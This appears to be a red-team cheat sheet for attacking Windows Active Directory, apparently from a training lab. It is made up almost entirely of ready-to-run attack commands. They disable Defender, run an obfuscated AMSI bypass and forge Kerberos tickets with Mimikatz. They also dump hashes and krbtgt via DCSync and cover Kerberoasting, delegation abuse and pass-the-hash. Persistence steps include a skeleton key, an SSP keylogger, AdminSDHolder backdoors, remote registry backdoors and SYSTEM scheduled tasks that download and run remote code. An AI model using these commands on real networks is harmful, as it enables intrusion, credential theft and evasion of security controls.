Glossary
Security bypass
Policy bypass
``
Disable Defender
Set-MpPreference -DisableIOAVProtection $true Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableBehaviorMonitoring $true Set-MpPreference -DisableIntrusionPreventionSystem $true Set-MpPreference -DisablePrivacyMode $true
AMSI Bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(echo tty)p`E"(( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s",'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa',"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE)"($(),$(1 -eq 1))
Run after each ticket forge
klist Invoke-mimikatz -Command '"sekurlsa::pth /domain:<DomainControllerName> /user:<username> /ntlm:<CapturedValue> /run:powershell.exe"' Invoke-Mimkatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAINNAMEFQDN> /sid:<Domain SID> /krbtgt:<RC4 NTLM HASH> /ptt"' Invoke-Mimkatz -Command '"kerberos::golden /domain:<DOMAINNAMEFQDN> /sid:<Domain SID> /target:<server FQDN> /service:<ServiceName> /rc4:<RC4 NTLM HASH> /User:Administrator /ptt"' Invoke-mimikatz -Command '"kerberos::ptt <TicketFilePAth>"'
Download File
iex (iwr URL)
Enumeration
Local Privs Escalation
Current Domain where current user has local admin access
Find-LocalAdminAccess -Verbose Invoke-CheckLocalAdminAccess
In case RPC and SMB are blocked
Find-WMILocalAdminAccess.ps1 Find-PSRemotingLocalAdminAccess.ps1 Invoke-EnumerateLocalAdmin -Verbose <!--Local Admin on non Domain Controller machine --> Get-NetComputer then Get-NetLocalGroup
Hunting session for domain admins
Invoke-UserHunter Invoke-UserHunter -Stealth
Hunting Group Users sessions
Inoke-User-Hunter -GroupName "<GroupName>"
Confirm Admin Access
Invoke-UserHunter -CheckAcces
List unquoted paths
Get-ServiceUnquoted -Verbose
Current user can write to binary path
Get-ModifiableServiceFile -Verbose
Get services whose configuration can be modified by the current user
Get-ModifiableService -Verbose
BloodHund Exec
Invoke-BloodHund -CollectionMethods All
Then
Invoke-BloodHund -CollectionMethods All -ExcludeDC
Remote command Execution
$sess = New-PSSession -ComputerName Server1 Invoke-Command -Session $sess -ScriptBlock{$proc = Get-Process} Invoke-Command -Session $sess -FilePAth C:\AD\Tools\XX.ps1 Invoke-Command -Session $sess -ScriptBlock {$Proc.Name} Enter-PSSession -Session $sess
Run on Multiple Machines
Invoke-Command -FilePath C:\DDFDF.ps1 -ComputerName (Get-Content ServerList.File)
Privs Escalation
1️⃣ Kerberoast : Offline cracking TGS Hashes
💁 Offline password decryption : save ticket on HDD and try to decrypt the ticket
💡 ServicePrincipalName is not null if the used account is a services account
Search for Services Accounts
Powerview
Get-NetUser -SPNAD module
Get-ADUser -Filter {ServicePrinicpalName -ne "$null"} -Properties ServicePrinicpalName1️⃣ 1️⃣ Request a TGS
AD Module
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <ServicePrinicpalNAme> klistExport Ticket to the Disk
Invoke-Mimikatz -Command '"kerberos::list /export"'Cracking
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt <tikeik.kirbiPAth>Powerview
Request-SPNTicket
1️⃣2️⃣ Kerberose PreAuth Disabled
💁 Grap users carackable AS-Rep then brute-force them
💁 GenericWrite and GenericAll are sufficient to disable Kerberose preauth
Force disable Kerberose PreAuth
PowerView_dev
Invoke-ACLScanner -ResolveGUIDS | ?{$_.IdentityReferenceName -match <groupname>} Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose Get-DomainUser -PreAuthNotRequired -VerboseEnumerate PreAuth disabled's users
PowerView
Get-DomainUser -PreauthNotRequired -VerboseAD Module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesnNoteRequirePreAuthExploit {Request encrypted AS-REP for offline bruteforce}
ASREPRoast fetch hashes
. .\ASREPRoast.ps1 Get-ASREPHASH -UserNAme <username> -VerboseEnumerate and bring AS-REP in 1️⃣ Step
Invoke-ASREPRoast -VerboseJohnTheRipper Cracking password
./john <HashFilePath> --wordlist=wordlist.txt1️⃣3️⃣ TGS Kerberoasted using SPN
💁 GenericWrite and GenericAll are sufficient to set target user's SPN to Custom value
💁 Machine name and SPN name are unique across the domain
Enumeration
PowerView_Dev
Look for GenericAll and/or GenericWrite permissions
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match <groupname>}Check User SPN value
Get-DomainUser -Identity <username> | select ServicePrincipalNameAD Module
Get-ADUser -Identity <username> -Properties ServicePrincipalName | select ServicePrincipalNameExploit
Set SPN Value
Powerview Dev
Set-DomainObject -IDentity <username> -Set @{serviceprincipalname='<machinename/SPNname>'}AD Module
Set-ADUser -Idnetity <username> -ServicePrincipalNames @{Add='<Machinename/SPNName>'}Request Service Ticket
AD module
Add-Type -AssemblyName System.IdentityModel -New-Object System.IdentityModule.Tokens.KerberosRequestorSecurityToken -ArgumentList "<MAchineName/SPNNAme>" klist Invoke-Mimikatz -Command '"kerberose::list /export"'PowerView_Dev
Request-SPNTicket
Crack Password offline
python tgsrepcrack.py WordlistDict.txt <TicketName>2️⃣Kerberos Delegation : re-user end-user credentials to access resources hosted on a different server
💁 Service Account must be trusted for delegation to be able to make requests as a user.
💁 A mechanism is required to impersonate the incoming user and authenticate to the second hop server.
2️⃣ 1️⃣ Unconstrained Delegation -- Double hopes Kerberos
💁 Allow Access to any service on any computer in the domain
💁 User present TGT inside TGS to the first Server's service
💁 DC make sure that the TGT account owner is not marked as sensitive or can't be delegated
💁 Incase UNC-Delegation enabled, TGT extracted from TGS and Stored in LSASS, that's how the server can reuse the user's TGT to access any other resources
🚨 Compromise machine with unconstrained delegation and a Domain Admin connects to that machine;
Enumerate Domain computer with unconstrained delegation
PowerView
Get-NetComputer -UnConstrainedActive Directory Module
Get-ADComputer -Filter {TrustedForDelegation -eq $True} Get-ADUser -Filter {TrustedForDelegation -eq $True}Compromise The Machine
Extract Domain Admin Tokens
Invoke-mimikatz -Command '"sekurlsa::tickets /export"'Cron Job Watching logon
Invoke-UserHunter -ComputerName <ServerName> -Poll 100 -Username <UserNAme> -Delay 5 -VerboseExploit
Reuse TGT ticket
Invoke-mimikatz -Command '"kerberos::ptt <tgtFilePAth>"' ls \\dcorp-dc.dollarcorp.moneycorp.local\C$2️⃣ 1️⃣ Constrained Delegation
💁 Request only to specified services on specified computers;
💡 User account is not blocked for delegation
💡 Abuse Condition : Have Access to the Service Account, then it is possible to access the services listed in msDS-AllowedToDelegateTo
ℹ️ If the user is not using Kerberos Authentication to authenticate to the first hope server, Window offer protocol transition to transition the request to Kerberos
📖 User authenticates to a web service without Kerberose and the web service makes requests to Database server fetching results based on the user's authorization.
Service for User to Self (S4U2self) : Allows Service to obtain a forwarded TGS to its self on behalf a user with just the user's principal name.
💁 Service account must have the TRUSTED_TO_AUTHENTICATED_FOR_DELEGATION - T2A4D UserAccountControlAttribute
Service for User to Proxy(S4U2proxy) : Allows a service to obtain a TGS to a second service on behalf a user
💁 This controlled by msDS-AllowedToDelegateTo attribute contains a list of SPNs to which user tokens can be forwarded
Exploit
1️⃣ Enumerate users and computers with constrained delegation enabled
Powerview_dev
Get-DomainUser -TrustedToAuth Get-DomainComputer -TrustedToAuthAD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Porperties *2️⃣ Impersonation
💁 Either PlainText or NTLM hash is required
KEko# tgt::ask /user:<ServiceuserNAme> /domain:<domainFQDN> /rc4:<NTLMHash> Keko# tgs::s4u /tgt:<TGTFilePAth> /user:Administrator@<DomainFQDN> /service:<cifs/machinename.DomainFQDN>Inject Ticket to PTT
Invoke-mimikatz -Command '"kerberos::ptt <TicketFilePAth>"' klist ls \\MachineName.DomanFQDN\C$💡 Abuse other services running under same account name is also possible because there is no SPN validation
👀 Having access to a machine NTLM and this machine has AccessDelegation enabled, allows you to compromise the machine
KEKO# tgt::ask /user:<machineNAme>$ /domain:<DomainFQDN> /rc4:<MachineNTLMHash> KEKO# tgs::s4u /tgt:<TGTFilePAth> /user:<Administrator@<DomainFQDN> /service:<serviceNAme/DomainFQDN> | <serviceNAme/DomainFQDN>
Persistence Mimikatz at rescue:
1️⃣ Dumb Creds
1️⃣
🅰️ Invoke-Mimikatz -DumpCreds
2️⃣ KRBTGT
Get krbtgt from DC as Domain admin
2️⃣
🅱️ Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
3️⃣ DCSync attack to extract krbtgt using Domain Admin privs
3️⃣
🅰️ Invoke-Command -Command '"lsadump::dcsync /user:<DOMAINNAME>\krbtgt"'
4️⃣ Golden Ticket -- krbtgt NTLM is key of encryption (TGS)
Fork a ticket from any machine
Invoke-Mimkatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAINNAMEFQDN> /sid:<Domain SID> /krbtgt:<RC4 NTLM HASH> /ptt"'
Clone Someone Ticket
4️⃣
🅰️ Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:<domainName> /ntlm:<hash> /run:powershell.exe"'
5️⃣ Sliver Tickets -- Service account NTLM value is key of encryption (TGS)
Dump Services RC4 {RID:1000, User:DCORP-DC$}
5️⃣
🅰️ Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc
5️⃣
🅱️ Invoke-Mimkatz -Command '"kerberos::golden /domain:<DOMAINNAMEFQDN> /sid:<Domain SID> /target:<server FQDN> /service:<ServiceName> /rc4:<RC4 NTLM HASH> /User:Administrator /ptt"'
ℹ️
Host -> to start schdule
,cifs -> explorer file system
Use Sliver Ticket to run task
schtasks /create /S <DomainNAme> /SC Weekly /RU "NT Authority\SYSTEM" /TN "<TaskNAme>" /TR "<Task action>"
/TR "powershell.exe -c 'iex(iwr URL)'"
Run Task
schtasks /Run /S <DomainName> /TN "TASKNAME"
6️⃣ Skeleton Key -- Patch Lsass by injecting Skeleton key to access any resources (Password: mimikatz) DC not rebooted
Domain Admin is required
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName <DomainNAmeFQDN>
Then
Enter-PSSEssion -ComputerName <DomainController> -credential <domain>\Administrator
Protected Lsass -- Copy mimidriv.sys on the target's hard disk
mimikatz # privilege::debug mimikatz # !+ mimikatz # !processprotect /process:lsass.exe /remove mimikatz # misc::skeleton mimikatz # !-
7️⃣ DSRM -- Safe mode of any domain controller -- Directory Services Restore Mode SafeModePassword -- Rarely change
ℹ️ Local Administrator's password on DC ( different from RID:500)
🚨 Domain Admin Access Required
Invoke-mimikatz -Command '"token::elevate" "lsadump::sam"' - ComputerName <DomainControlerFQDN>
Then Change logon behavior to the local admin account by adding Hive
Enter-PSSession -ComputerName <DomainControllerFQDN>
Then
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
Validate Changes
Get-ItemProperty "HKLM:\System\CurrentConrtolSet\Control\Lsa\"
Then You can use the following command to gain access
Invoke-mimikatz -Command '"sekurlsa::pth /domain:<DomainControllerName> /user:Administrator /ntlm:<CapturedValuePreviously> /run:powershell.exe"'
Access Directory
ls \\domainControllerName\C$
8️⃣ Security Support Provider -- DLL file allows the application to obtain authenticated connection
Supported SSP Packages are NTLM, Kerberos, Wdigest, CredSSP
mimilib.dll is a custom SSP do a keylogger for accounts passwords in clear text on target server
🅰️ Injecting to LSASS -- Not StableInvoke-mimikatz -Command '"misc::memssp"'
🅱️ Drops mimilib.dll in System32 then add Hive$package = Get-ItemProperty HKLM:\SYSTEM\CurrentContolSet\Control\Lsa\osconfig -Name 'Security Packages'| select-ExpandProperty 'Security Packages' $package+="mimilib" Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\osconfig\ -Name 'Security PAckages' -Value $package Set-ItemProperty HKLM:\SYSTEM\CureentControlSet\Control\Lsa\ -Name 'Security PAckages' -Value $package
🚨 Logs @ C:\Windows\System32\kiwissp.log
9️⃣ ACLs
9️⃣
🅰️ AdminSDHolder : Control the permissions using an ACL for Protected Group [Static Values of ACL]Security Descriptor Propagator (SDPROP) runs every hour overwritten on object ACL by comparing the ACL of protected groups and members with the ACL of AdminSDHolder
ℹ️ Add your account in the AdminSDHolder gives persistence
Add Full Permission for a user in AdminSDHolder
Need Domain Admin 🚨 privs to execute 👇
PowerView
add-objectACL -TargetADSprefix 'CN=AdminSDHolder,CN=System'-PrincipalSamAccountName <YOUR account> -Rights All -Verbose
ACTIVE Directory
1️⃣
Import-Module Microsoft.ActiveDirectory.Management.dll
2️⃣
Import-Module ActiveDirectory.psd1
3️⃣
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Pricipal <accountNAme> -Verbose
4️⃣ Run Propagator
$sess = New-PSSession -ComputerName DomainDC Invoke-Command -FilePAth .\Invoke-SDPropagator.ps1 -Session $sess Enter-PSSEssion -Session $sess Invoke-SDPropagator -showProgress -timeoutMinutes 1
5️⃣ Validate ACL
. .\Powerview.ps1 Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match '<accountNAme>'}
6️⃣ Abuse it
Add Member to Group
AD Module
Add-ADGroupMember -Identity 'Domain Admins' -Members <AccountName>
PowerView_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members <AccountName> -Verbose
Verify
Get-ADUser -Identity <AccountNAme> Get-ADGroupMember -Identity 'domain admins
Reset Account Password
AD Module
Set-ADAccountPAssword -Identity <AccountNAme> -NewPAssword (ConvertTo-SecureString 'PASSME#!0rd' -AsPlainText -Force) -Verbose
PowerView_dev
Set-DomainUserPAssword -Identity <AccountNAme> -AccountPAssword (ConvertTo-SecureString 'P@ssw0rdM3!' -AsPlainText -Force) -Verbose
9️⃣
🅱️ Domain Object ACL9️⃣
🅱️ 1️⃣ PowerView_devAdd-ObjectACL -TargetDistinguishedNAme 'DC=dollarcorp,DC=monrycorp,DC=local' -PrincipaleSamAccountNAme <AccountNAme> -Rights All -Verbose
OR add DCSync rights only
Add-ObjectACL -TargetDistinguishedNAme 'DC=dollarcorp,DC=monrycorp,DC=local' -PrincipaleSamAccountNAme <AccountNAme> -Rights DCSync -Verbose
9️⃣
🅱️ 2️⃣ AD ModuleSet-ADACL -DistinguishedNAme 'DC=dollarcorp,DC=monrycorp,DC=local' -Principale <accountNAme> -Verbose
OR add DCSync rights only
Set-ADACL -DistinguishedNAme 'DC=dollarcorp,DC=monrycorp,DC=local' -Principale <accountNAme> -GUIDRight DCSync -Verbose
9️⃣
🅱️ 🏃Abuse
🅰️ Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\Administrator"'
🅱️ Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
9️⃣C Modify Security Descriptor of multiple remote access methods
ℹ️ Domain Administrative privileges are required
💡 Security Descriptor Definition Language SDDL use ACE strings
💁 ACE for built-in Administrator for WMI namespace
A;CI;CCDCLCSWRPWPRCWD;;;SID
💡 Two point of interest here are : COM security Component ACL in
component services
including subsequences namespaces and Namespace in ACLcomputer management
Test Payload
Get-WMIobject -class win32_operatingsystem -ComputerName <domainFQDN>
ACL modification
. .\Set-RemoteWMI.ps1
Add permissions - Run on Local Machine
Set-RemoteWMI -UserNAme <username> -Verbose**Add permissions - Run on remote machine **
Set-RemoteWMI -UserName <username> -ComputerName <computerNAme> -nameSpace 'root\cimv2' -VerboseAdd permissions - Run on remote machine with specific credentials
Set-RemoteWMI -UserName <username> -ComputerName <computerNAme> -nameSpace 'root\cimv2' -Credential Administrator -VerboseRemove permissions remotely
Set-RemoteWMI -UserName <username> -ComputerName <computerNAme> -nameSpace 'root\cimv2' -Remote -VerboseExecute Remote Command using PS session
.. .\Set-RemotePSRemoting.ps1 Set-RemotePSRemoting -UserNAme <username> -ComputerName <domainFQDN> -VerboseValidation command
Invoke-Command -ScriptBlock{whoami;} -ComputerName <DCFQDN>Remote Registry modification
USE DAMP with admin privs on remote machine
. .\Add-RemoteBackoor.ps1 Add-RemoteRegBackdoor -ComputerName <computerNAme> -Trustee <username> -VerboseAbuse
💁 replace $IV by $initIV
. .\RemoteHAshRetrival.ps1
Retrieve machine account hash
Get-RemoteMAchineAccountHash -ComputerName <computerName> -VerboseRetrieve local account hash --DSRM password in case DomainControler ComputerName
Get-RemoteLocalAccountHash -ComputerName <computerNAme> -VerboseRetrieve domain cached credentials
Get-RemoteCachedCredential -ComputerName <computerName> -Verbose
Scripts
Powerup Tutorial
https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
Jenkines
RCE Exec in scripts
http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html
Building Job
http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilege-esc-jenkins.html
http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html
DCInternal
https://www.ultimatewindowssecurity.com/blog/default.aspx?d=10/2017